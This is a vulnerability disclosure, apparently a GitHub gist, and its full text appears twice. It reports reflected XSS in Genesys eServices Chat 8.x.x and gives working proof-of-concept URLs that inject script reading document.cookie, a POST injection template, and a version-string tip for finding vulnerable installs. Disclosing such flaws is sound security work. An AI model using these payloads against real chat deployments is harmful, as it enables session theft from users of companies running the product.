MortalP0ison/Vulnerability in Genesys eServices Chat 8.x.x Secret

## Vulnerability in Genesys eServices Chat 8.x.x
Hi for all,

My name is Luis Eduardo Jácome V.(a.k.a Mortal_Poison) and I find a vulnerability(gXSS and pXSS) in Genesys eServices Chat that affects the versions 8.x.x.

First of all, if you find Genesys eServices Chat with "<!-- Version 8.1.200.03 -->" in the HTML Source, is vulnerable:

A small PoC(for versions 8.1.x):

https://example.com/HtmlChatPanel.jsp?Email=%3C/Script/%3E%3CScript/%3E(confirm)(document.cookie)%3C/Script/%3E
http://example.com/HtmlChatFrameSet.jsp?email=%3C/Script/%3E%3CScript/%3E(confirm)(1)%3C/Script/%3E


https://example.com/HtmlChatPanel.jsp?ActionColor=%3C/Script/%3E%3CSvg/OnLoad=(confirm)(document.cookie)%3E&ClientNickNameColor=%3C/SCRIPT/%3E&AgentNickNameColor=008000&ClientMessageColor=1532a0&AgentMessageColor=708090&Logo=.%2FResource%2FImages%2Flogo.jpg&FontSize=3&FontName=arial&ShowSmiles=1&BackgroundColor=FFFFFF


The problem is that application not sanitize correctly the "values" of form(HtmlChatFrameSet.jsp and/or HtmlChatPanel.jsp).
The file changes with respect to the version of Genesys eServices Chat. However, in any of the versions, the form is not validated.

For versions with HTML Source "<!-- Version 8.1.000.07 -->", you can execute the next payload:

https://example.com/HtmlChatPanel.jsp?ActionColor=%3C/Script/%3E%3CSvg/OnLoad=(confirm)(document.cookie)%3E&ClientNickNameColor=%3C/SCRIPT/%3E&AgentNickNameColor=008000&ClientMessageColor=1532a0&AgentMessageColor=708090&Logo=.%2FResource%2FImages%2Flogo.jpg&FontSize=3&FontName=arial&ShowSmiles=1&BackgroundColor=FFFFFF

If the request is made by POST method, you should see something like the following (may vary, depending on the fields of the form):
cmd=connect&chat_alias=&first_name=null&last_name=null&email_address=%INJECT_HERE%&celular=null&subject=null&msg2send=&secure_key=&user_id=&script_pos=&session_id=&timeZoneOffset=-300

In the part of %Inject_Here% you have to inject the malicious payload as for example: </Script/><Script/>(confirm)(1)</Script/>

You must insert it without the "%".

Remember that you must capture it with an application that intercepts requests, in my case, BurpSuite.

The product is used by many companies, however, not all are indexed by search engines.

https://example.com/HtmlChatPanel.jsp?ActionColor=080008&ClientNickNameColor=000019&AgentNickNameColor=0a82d8&ClientMessageColor=030717&AgentMessageColor=0074ce&Logo=https%3A%2F%2Fcontact.falabella.com%2FWebAPI812%2FSODIMAC_AR%2FChat%2FResources%2FImages%2Flogo.jpg&FontSize=13px&FontName=arial&ShowSmiles=0&BackgroundColor=FFFFFF


Contact:

Twitter: @Mortal_Poison_
Youtube: https://youtube.com/XecureLabs
Web Page: https://xecure-labs.com

Affected versions:
Genesys eServices Chat 8.x.x

Tested on:
Firefox 50.0 and 60.0
	Hi for all,

	My name is Luis Eduardo Jácome V.(a.k.a Mortal_Poison) and I find a vulnerability(gXSS and pXSS) in Genesys eServices Chat that affects the versions 8.x.x.

	First of all, if you find Genesys eServices Chat with "<!-- Version 8.1.200.03 -->" in the HTML Source, is vulnerable:

	A small PoC(for versions 8.1.x):

	https://example.com/HtmlChatPanel.jsp?Email=%3C/Script/%3E%3CScript/%3E(confirm)(document.cookie)%3C/Script/%3E
	http://example.com/HtmlChatFrameSet.jsp?email=%3C/Script/%3E%3CScript/%3E(confirm)(1)%3C/Script/%3E


	https://example.com/HtmlChatPanel.jsp?ActionColor=%3C/Script/%3E%3CSvg/OnLoad=(confirm)(document.cookie)%3E&ClientNickNameColor=%3C/SCRIPT/%3E&AgentNickNameColor=008000&ClientMessageColor=1532a0&AgentMessageColor=708090&Logo=.%2FResource%2FImages%2Flogo.jpg&FontSize=3&FontName=arial&ShowSmiles=1&BackgroundColor=FFFFFF


	The problem is that application not sanitize correctly the "values" of form(HtmlChatFrameSet.jsp and/or HtmlChatPanel.jsp).
	The file changes with respect to the version of Genesys eServices Chat. However, in any of the versions, the form is not validated.

	For versions with HTML Source "<!-- Version 8.1.000.07 -->", you can execute the next payload:

	https://example.com/HtmlChatPanel.jsp?ActionColor=%3C/Script/%3E%3CSvg/OnLoad=(confirm)(document.cookie)%3E&ClientNickNameColor=%3C/SCRIPT/%3E&AgentNickNameColor=008000&ClientMessageColor=1532a0&AgentMessageColor=708090&Logo=.%2FResource%2FImages%2Flogo.jpg&FontSize=3&FontName=arial&ShowSmiles=1&BackgroundColor=FFFFFF

	If the request is made by POST method, you should see something like the following (may vary, depending on the fields of the form):
	cmd=connect&chat_alias=&first_name=null&last_name=null&email_address=%INJECT_HERE%&celular=null&subject=null&msg2send=&secure_key=&user_id=&script_pos=&session_id=&timeZoneOffset=-300

	In the part of %Inject_Here% you have to inject the malicious payload as for example: </Script/><Script/>(confirm)(1)</Script/>

	You must insert it without the "%".

	Remember that you must capture it with an application that intercepts requests, in my case, BurpSuite.

	The product is used by many companies, however, not all are indexed by search engines.

	https://example.com/HtmlChatPanel.jsp?ActionColor=080008&ClientNickNameColor=000019&AgentNickNameColor=0a82d8&ClientMessageColor=030717&AgentMessageColor=0074ce&Logo=https%3A%2F%2Fcontact.falabella.com%2FWebAPI812%2FSODIMAC_AR%2FChat%2FResources%2FImages%2Flogo.jpg&FontSize=13px&FontName=arial&ShowSmiles=0&BackgroundColor=FFFFFF


	Contact:

	Twitter: @Mortal_Poison_
	Youtube: https://youtube.com/XecureLabs
	Web Page: https://xecure-labs.com

	Affected versions:
	Genesys eServices Chat 8.x.x

	Tested on:
	Firefox 50.0 and 60.0